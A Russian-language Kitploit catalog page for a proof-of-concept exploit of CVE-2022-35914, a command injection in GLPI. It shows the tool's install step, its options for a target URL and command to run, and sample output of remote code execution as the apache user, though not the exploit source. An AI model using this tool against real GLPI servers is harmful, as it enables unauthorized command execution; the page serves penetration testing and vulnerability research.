Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-35914-poc — Эксплойт proof-of-concept для CVE-2022-35914 — уязвимости внедрения команд в GLPI через скрипт сторонней библиотеки. Выполняет произвольные команды на уязвимых экземплярах GLPI. | Kitploit
Инструменты/GitHubGitHub/cosad3s/cve-2022-35914-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubcosad3s/cve-2022-35914-poc

CVE-2022-35914-poc

Эксплойт proof-of-concept для CVE-2022-35914 — уязвимости внедрения команд в GLPI через скрипт сторонней библиотеки. Выполняет произвольные команды на уязвимых экземплярах GLPI.

Репозиторий
511112 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-35914 PoC

Ссылки

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr

Использование

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help            show this help message and exit
  -u URL                URL to test
  -c CMD                Command to launch
  -f HOOK               PHP hook function (default: exec)
  --check               Just check, no command execution.
  --user-agent USER_AGENT
                        Custom User-Agent

Пример:

root@kitploit:~
❯ ./CVE-2022-35914.py -u http://glpi
[+] Command output (Return code: 0):
 uid=48(apache) gid=48(apache) groups=48(apache)
Скачать инструмент